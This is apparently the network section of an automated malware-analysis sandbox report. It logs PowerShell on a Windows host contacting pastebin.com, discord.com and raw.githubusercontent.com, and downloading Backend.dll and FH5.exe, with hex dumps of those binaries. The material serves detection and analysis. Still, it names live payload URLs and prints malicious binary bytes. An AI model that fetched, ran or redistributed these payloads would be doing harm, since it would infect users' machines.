                                                                                    Oct 15, 2024 18:08:32.844623089 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:32.849471092 CEST8049807104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:32.849642992 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:32.855525970 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:32.860320091 CEST8049807104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.485234976 CEST8049807104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.487554073 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:33.487588882 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.487651110 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:33.490365028 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:33.490376949 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:33.528616905 CEST4980780192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.469789028 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.469887018 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.473529100 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.473539114 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.473920107 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.479969978 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.527400970 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.632415056 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.632512093 CEST44349810104.20.3.235192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.632654905 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.645668030 CEST49810443192.168.2.7104.20.3.235
                                                                                    Oct 15, 2024 18:08:34.678235054 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:34.683291912 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:34.683371067 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:34.683706045 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:34.688610077 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.323663950 CEST8049819185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.323909044 CEST4981980192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.325493097 CEST49821443192.168.2.7185.199.109.133
                                                                                    Oct 15, 2024 18:08:35.325531006 CEST44349821185.199.109.133192.168.2.7
                                                                                    Oct 15, 2024 18:08:35.325583935 CEST49821443192.168.2.7185.199.109.133
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 18:08:10.557008028 CEST | 61116 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 18:08:10.564726114 CEST | 53 | 61116 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 18:08:24.728959084 CEST | 56258 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 18:08:24.735841990 CEST | 53 | 56258 | 1.1.1.1 | 192.168.2.7
Oct 15, 2024 18:08:27.125284910 CEST | 49805 | 53 | 192.168.2.7 | 1.1.1.1
Oct 15, 2024 18:08:27.132586002 CEST | 53 | 49805 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 18:08:10.557008028 CEST | 192.168.2.7 | 1.1.1.1 | 0x2172 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:24.728959084 CEST | 192.168.2.7 | 1.1.1.1 | 0xa12d | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:27.125284910 CEST | 192.168.2.7 | 1.1.1.1 | 0xad72 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 18:08:10.564726114 CEST | 1.1.1.1 | 192.168.2.7 | 0x2172 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:10.564726114 CEST | 1.1.1.1 | 192.168.2.7 | 0x2172 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:10.564726114 CEST | 1.1.1.1 | 192.168.2.7 | 0x2172 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:10.564726114 CEST | 1.1.1.1 | 192.168.2.7 | 0x2172 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:24.735841990 CEST | 1.1.1.1 | 192.168.2.7 | 0xa12d | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:24.735841990 CEST | 1.1.1.1 | 192.168.2.7 | 0xa12d | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:24.735841990 CEST | 1.1.1.1 | 192.168.2.7 | 0xa12d | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:27.132586002 CEST | 1.1.1.1 | 192.168.2.7 | 0xad72 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:27.132586002 CEST | 1.1.1.1 | 192.168.2.7 | 0xad72 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:27.132586002 CEST | 1.1.1.1 | 192.168.2.7 | 0xad72 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:27.132586002 CEST | 1.1.1.1 | 192.168.2.7 | 0xad72 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 18:08:27.132586002 CEST | 1.1.1.1 | 192.168.2.7 | 0xad72 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
• raw.githubusercontent.com
• pastebin.com
• discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49759 | 104.20.3.235 | 80 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 18:08:24.761657953 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 18:08:25.440244913 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 16:08:25 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 17:08:25 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d3111568ba8469c-DFW
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49770 | 185.199.109.133 | 80 | 7548 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 18:08:26.352574110 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 18:08:26.974811077 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 16:08:26 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120083-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729008507.917101,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 16:13:26 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49807 | 104.20.3.235 | 80 | 7912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 18:08:32.855525970 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 18:08:33.485234976 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 16:08:33 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 17:08:33 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d311188eb4feb12-DFW
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49819 | 185.199.109.133 | 80 | 7912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 18:08:34.683706045 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 18:08:35.323663950 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 16:08:35 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdfw8210062-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729008515.266683,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 16:13:35 GMT
Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 185.199.109.133 | 443 | 6648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-15 16:08:11 UTC | 224 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: raw.githubusercontent.com
Connection: Keep-Alive
2024-10-15 16:08:11 UTC | 900 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 31744
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "bd4b192ae5469f45e129df181fc4929ee39a6dc957f48659a8b8da2b1d018ac5"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: E1F8:380602:8F2763:9CE16C:670E936A
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 16:08:11 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120069-DFW
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1729008491.300035,VS0,VE98
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6369e3097a95d2354756dfb7b56d12a52f6279de
Expires: Tue, 15 Oct 2024 16:13:11 GMT
Source-Age: 0
2024-10-15 16:08:11 UTC | 1378 | IN | Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ZXFLLLLY*RichPEd
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 8b 01 48 8d 54 24 40 48 3b ca 0f 95 c2 ff 50 20 48 8b 8c 24 80 00 00 00 48 33 cc e8 66 1e 00 00 48 8b 9c 24 a0 00 00 00 48 81 c4 90 00 00 00 5f c3 cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 55 48 8d 6c 24 a9 48 81 ec d0 00 00 00 48 8b 05 cd 58 00 00 48 33 c4 48 89 45 47 48 8d 05 cf 3c 00 00 48 89 45 e7 c7 45 ef 47 01 86 01 c7 45 f3 53 01 2b 01 c7 45 f7 1f 01 47 01 c7 45 fb 86 01 73 01 c7 45 ff 2b 01 17 01 c7 45 03 5a 01 47 01 c7 45 07 82 01 63 01 c7 45 0b 2b 01 a6 01 c7 45 0f 47 01 8e 01 c7 45 13 e3 01 bf 01 c7 45 17 0f 01 0f 01 c7 45 1b 0f 01 3c 01 c7 45 1f d4 01 86 01 c7 45 23 52 01 68 01 c7 45 27 47 01 84 01 c7 45 2b 76 01 57 01 48 8b 1d 74 58 00 00 48 8d 55 b7 48 8d 4d e7 e8 47 08 00 00 90 48 8b 45 b7 48 8b 55 bf 48 3b c2 74 12 80 78
                                                                                    Data Ascii: HT$@H;P H$H3fH$H_H\$Ht$H|$UHl$HHXH3HEGH<HEEGES+EGEsE+EZGEcE+EGEEE<EE#RhE'GE+vWHtXHUHMGHEHUH;tx
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 04 41 ff d0 90 48 8b 45 b7 48 8b 55 bf 48 3b c2 74 14 66 90 80 78 01 00 74 03 80 30 0f 48 83 c0 02 48 3b c2 75 ee 4c 8d 45 b7 48 8d 55 cf 48 8b cb e8 4e 11 00 00 90 48 8b 4d b7 48 85 c9 74 3b 48 8b 45 c7 48 2b c1 48 d1 f8 48 8d 14 00 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 47 35 00 00 cc e8 51 1c 00 00 48 8b 5d cf 48 8d 7b 08 48 8b 05 6a 53 00 00 48 8b 08 48 8d 45 d7 48 89 44 24 20 41 b9 04 00 00 00 4c 8d 45 cf 48 8b d7 48 8b 49 08 ff 15 37 33 00 00 48 63 4d cf 48 83 c1 04 48 03 cf 48 89 0d fd 5b 00 00 48 83 c3 57 48 89 1d 2a 5c 00 00 48 8d 86 80 64 00 00 48 89 45 e7 c7 45 ef 00 01 8a 01 c7 45 f3 c3 01 0f 01 c7 45 f7 0f 01 0f 01 c7 45 fb 47 01 84 01 48 c7 45 ff 32 01 00 00 c7 45 07 00 00 47
                                                                                    Data Ascii: AHEHUH;tfxt0HH;uLEHUHNHMHt;HEH+HHHHrH'HIH+HHvG5QH]H{HjSHHEHD$ ALEHHI73HcMHHH[HWH*\HdHEEEEEGHE2EG
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 18 4c 89 64 24 20 55 41 56 41 57 48 8b ec 48 83 ec 70 48 8b 05 49 4e 00 00 48 33 c4 48 89 45 f0 48 83 3d a2 57 00 00 00 0f 85 ce 04 00 00 0f 57 c9 f3 0f 7f 4d c8 45 33 e4 4c 89 65 d8 c7 45 e0 55 48 89 e5 c7 45 e4 48 83 ec 20 41 8d 54 24 08 48 8d 4d c8 e8 49 0f 00 00 48 8d 7d e0 48 8b 75 d8 48 8b 5d d0 48 3b de 74 0e 0f b6 07 88 03 48 ff c3 48 89 5d d0 eb 17 4c 8b c7 48 8b d3 48 8d 4d c8 e8 3b 0d 00 00 48 8b 75 d8 48 8b 5d d0 48 ff c7 48 8d 45 e8 48 3b f8 75 ca 66 c7 45 e0 48 b8 48 8b 05 ea 56 00 00 48 89 45 e2 48 8b c6 48 2b 45 c8 48 83 f8 0a 73 16 ba 0a 00 00 00 48 8d 4d c8 e8 db 0e 00 00 48 8b 75 d8 48 8b 5d d0 48 8d 7d e0 48 3b de 74 0e 0f b6 07 88 03 48 ff c3 48 89 5d d0 eb 17 4c 8b c7 48 8b d3 48 8d 4d c8 e8 cd 0c 00 00 48 8b 75 d8 48 8b 5d d0 48 ff
                                                                                    Data Ascii: Ld$ UAVAWHHpHINH3HEH=WWME3LeEUHEH AT$HMIH}HuH]H;tHH]LHHM;HuH]HHEH;ufEHHVHEHH+EHsHMHuH]H}H;tHH]LHHMHuH]H
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 83 3d 59 52 00 00 00 0f 84 15 04 00 00 48 83 3d 53 52 00 00 00 74 51 48 8b 05 12 49 00 00 48 8b 08 48 8d 45 17 48 89 44 24 20 41 b9 1a 00 00 00 4c 8d 45 27 48 8b 15 f5 51 00 00 48 8b 49 08 ff 15 db 28 00 00 41 b8 1a 00 00 00 48 8d 15 ee 48 00 00 48 8d 4d 27 e8 3c 1d 00 00 85 c0 0f 95 c0 84 c0 0f 85 ba 03 00 00 e8 23 fa ff ff 48 8b 0d dc 51 00 00 48 ff c9 48 23 0d da 51 00 00 48 8b 05 c3 51 00 00 48 8b 14 c8 45 33 f6 4c 89 75 f7 4c 89 75 07 4c 89 75 0f 0f 10 02 0f 11 45 f7 0f 10 4a 10 0f 11 4d 07 4c 89 72 10 48 c7 42 18 0f 00 00 00 44 88 32 48 8b 0d 93 51 00 00 48 ff c9 48 23 0d 91 51 00 00 48 8b 05 7a 51 00 00 48 8b 1c c8 48 8b 53 18 48 83 fa 10 72 30 48 8b 0b 48 ff c2 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 4c 8b 41 f8 49 2b c8 48 8d 41 f8 48 83 f8 1f 0f
                                                                                    Data Ascii: =YRH=SRtQHIHHEHD$ ALE'HQHI(AHHHM'<#HQHH#QHQHE3LuLuLuEJMLrHBD2HQHH#QHzQHHSHr0HHHrH'LAI+HAH
                                                                                    2024-10-15 16:08:11 UTC1378INData Raw: 48 8b cf e8 39 18 00 00 48 8b 15 d7 4c 00 00 48 03 df 48 8b cb 4c 3b fd 77 25 4d 8b c6 e8 1f 18 00 00 4c 8b c5 49 8d 0c 1e 4d 2b c7 33 d2 49 c1 e0 03 e8 99 16 00 00 4d 8b c6 48 8b ce eb 34 48 8d 3c ed 00 00 00 00 4c 8b c7 e8 f2 17 00 00 48 8b 05 90 4c 00 00 48 8b ce 49 8d 1c 06 48 8d 14 07 48 2b da 4c 8b c3 e8 d5 17 00 00 48 8d 0c 33 4c 8b c7 33 d2 e8 56 16 00 00 48 8b 0d 65 4c 00 00 4c 8b 74 24 28 48 8b 7c 24 30 48 8b 5c 24 40 48 85 c9 74 35 48 8b 05 52 4c 00 00 48 8d 14 c5 00 00 00 00 48 81 fa 00 10 00 00 72 18 4c 8b 41 f8 48 83 c2 27 49 2b c8 48 8d 41 f8 48 83 f8 1f 77 2a 49 8b c8 e8 dc 0b 00 00 48 01 2d 1d 4c 00 00 48 8b 6c 24 48 4c 8b 7c 24 20 48 89 35 04 4c 00 00 48 8b 74 24 50 48 83 c4 38 c3 ff 15 a4 24 00 00 cc e8 96 d6 ff ff cc e8 10 00 00 00 cc
                                                                                    Data Ascii: H9HLHHL;w%MLIM+3IMH4H<LHLHIHH+LH3L3VHeLLt$(H|$0H\$@Ht5HRLHHrLAH'I+HAHw*IH-LHl$HL|$ H5LHt$PH8$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49703 | 185.199.109.133 | 443 | 6648 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 16:08:12 UTC | 196 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exe HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
2024-10-15 16:08:12 UTC | 901 | IN | HTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 56320
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: application/octet-stream
                                                                                    ETag: "fbd9a681f4acce63a6718a2c29c8db9ab29a56e7e684d03951f580344762e00e"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: 37F3:2518BA:975F2A:A51381:670E9369
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:12 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210100-DFW
                                                                                    X-Cache: MISS
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008493.558934,VS0,VE139
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: 24b93079e1e4ea7249ef132f625fdfe099b30646
                                                                                    Expires: Tue, 15 Oct 2024 16:13:12 GMT
                                                                                    Source-Age: 0
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 9d f8 f7 ed 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 86 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0T @ `@@
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 00 0a 28 07 00 00 06 2a a6 02 7b 04 00 00 04 6f 25 00 00 0a 2c 16 02 7b 05 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 08 00 00 06 2a 28 09 00 00 06 2a 8e 02 7b 04 00 00 04 6f 25 00 00 0a 2c 15 02 7b 05 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 08 00 00 06 2a 46 02 7b 13 00 00 04 6f 38 00 00 0a 28 0c 00 00 06 2a 5a 02 7b 16 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 28 0a 00 00 06 2a 1a 28 0b 00 00 06 2a 7a 03 2c 13 02 7b 01 00 00 04 2c 0b 02 7b 01 00 00 04 6f 31 00 00 0a 02 03 28 39 00 00 0a 2a 00 13 30 05 00 2c 0d 00 00 04 00 00 11 02 73 3a 00 00 0a 7d 01 00 00 04 d0 03 00 00 02 28 3b 00 00 0a 73 3c 00 00 0a 0a 02 73 3d 00 00 0a 7d 02 00 00 04 02 73 3e 00 00 0a 7d 03 00 00 04 02 73 3f 00 00 0a 7d 04 00 00 04 02 73 40 00 00 0a 7d 05 00 00 04 02 73 41 00 00 0a
                                                                                    Data Ascii: (*{o%,{o6(7(*(*{o%,{o6(7(*F{o8(*Z{o6(7(*(*z,{,{o1(9*0,s:}(;s<s=}s>}s?}s@}sA
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 02 7b 07 00 00 04 72 ab 01 00 70 6f 4d 00 00 0a 02 7b 07 00 00 04 20 0d 01 00 00 20 98 00 00 00 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 07 00 00 04 18 6f 50 00 00 0a 02 7b 07 00 00 04 16 6f 5e 00 00 0a 02 7b 07 00 00 04 72 bf 01 00 70 6f 51 00 00 0a 02 7b 15 00 00 04 20 83 00 00 00 1f 73 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 15 00 00 04 72 c9 01 00 70 6f 4d 00 00 0a 02 7b 15 00 00 04 20 82 00 00 00 1f 17 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 15 00 00 04 1f 0a 6f 50 00 00 0a 02 7b 15 00 00 04 72 db 01 00 70 6f 51 00 00 0a 02 7b 15 00 00 04 17 6f 55 00 00 0a 02 7b 15 00 00 04 02 fe 06 1d 00 00 06 73 56 00 00 0a 6f 5f 00 00 0a 02 7b 16 00 00 04 1c 1f 73 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 16 00 00 04 1a 8d 44 00 00 01 25 16 20 ff c9 9a 3b 9e 73 58 00 00 0a 6f 59 00
                                                                                    Data Ascii: {rpoM{ sNo{oP{o^{rpoQ{ ssKoL{rpoM{ sNo{oP{rpoQ{oU{sVo_{ssKoL{D% ;sXoY
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 00 0a 02 7b 10 00 00 04 72 af 03 00 70 6f 4d 00 00 0a 02 7b 10 00 00 04 20 ac 00 00 00 1f 31 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 10 00 00 04 1f 0a 6f 50 00 00 0a 02 7b 10 00 00 04 16 6f 5e 00 00 0a 02 7b 10 00 00 04 72 c3 03 00 70 6f 51 00 00 0a 02 7b 11 00 00 04 17 6f 54 00 00 0a 02 7b 11 00 00 04 1c 1f 13 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 11 00 00 04 72 cd 03 00 70 6f 4d 00 00 0a 02 7b 11 00 00 04 20 9d 00 00 00 1f 11 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 11 00 00 04 16 6f 50 00 00 0a 02 7b 11 00 00 04 72 e7 03 00 70 6f 51 00 00 0a 02 7b 11 00 00 04 17 6f 55 00 00 0a 02 7b 08 00 00 04 02 fe 06 13 00 00 06 73 56 00 00 0a 6f 65 00 00 0a 02 7b 0a 00 00 04 1f 0a 6f 66 00 00 0a 02 7b 0a 00 00 04 02 fe 06 16 00 00 06 73 56 00 00 0a 6f 65 00 00 0a 02 7b 0c 00
                                                                                    Data Ascii: {rpoM{ 1sNo{oP{o^{rpoQ{oT{sKoL{rpoM{ sNo{oP{rpoQ{oU{sVoe{of{sVoe{
                                                                                    2024-10-15 16:08:12 UTC1378INData Raw: 0f 0c 0a 00 dd 0d 0f 0c 06 00 ee 0b 53 08 0a 00 e3 0b 0f 0c 12 00 bb 05 3a 06 06 00 35 02 53 08 06 00 25 08 d4 00 06 00 30 08 d4 00 0e 00 12 0a c0 07 06 00 77 08 53 08 06 00 86 03 53 08 0a 00 e5 0a 0f 0c 0e 00 c2 03 43 0a 06 00 d9 03 09 0b 06 00 99 03 3b 0b 06 00 1b 0a 5b 0b 06 00 89 09 db 08 0e 00 71 03 c0 07 0e 00 0a 04 c0 07 0e 00 4b 03 c6 08 0a 00 45 08 0f 0c 0a 00 1d 08 0f 0c 06 00 07 06 53 08 06 00 f9 0a 53 08 06 00 60 06 d4 00 06 00 05 03 d4 00 06 00 77 02 d4 00 06 00 36 08 d4 00 06 00 a2 02 53 08 06 00 7f 07 53 08 0a 00 19 08 0f 0c 0e 00 9e 0a c0 07 06 00 13 03 53 08 06 00 ae 02 53 08 0e 00 c0 05 c0 07 0a 00 a9 09 0f 0c 0a 00 14 09 0f 0c 12 00 4f 0d 3a 06 0a 00 40 03 0f 0c 06 00 36 0a 53 08 06 00 48 00 53 08 c7 00 02 09 00 00 77 00 2c 09 00 00 12
                                                                                    Data Ascii: S:5S%0wSSC;[qKESS`w6SSSSO:@6SHSw,
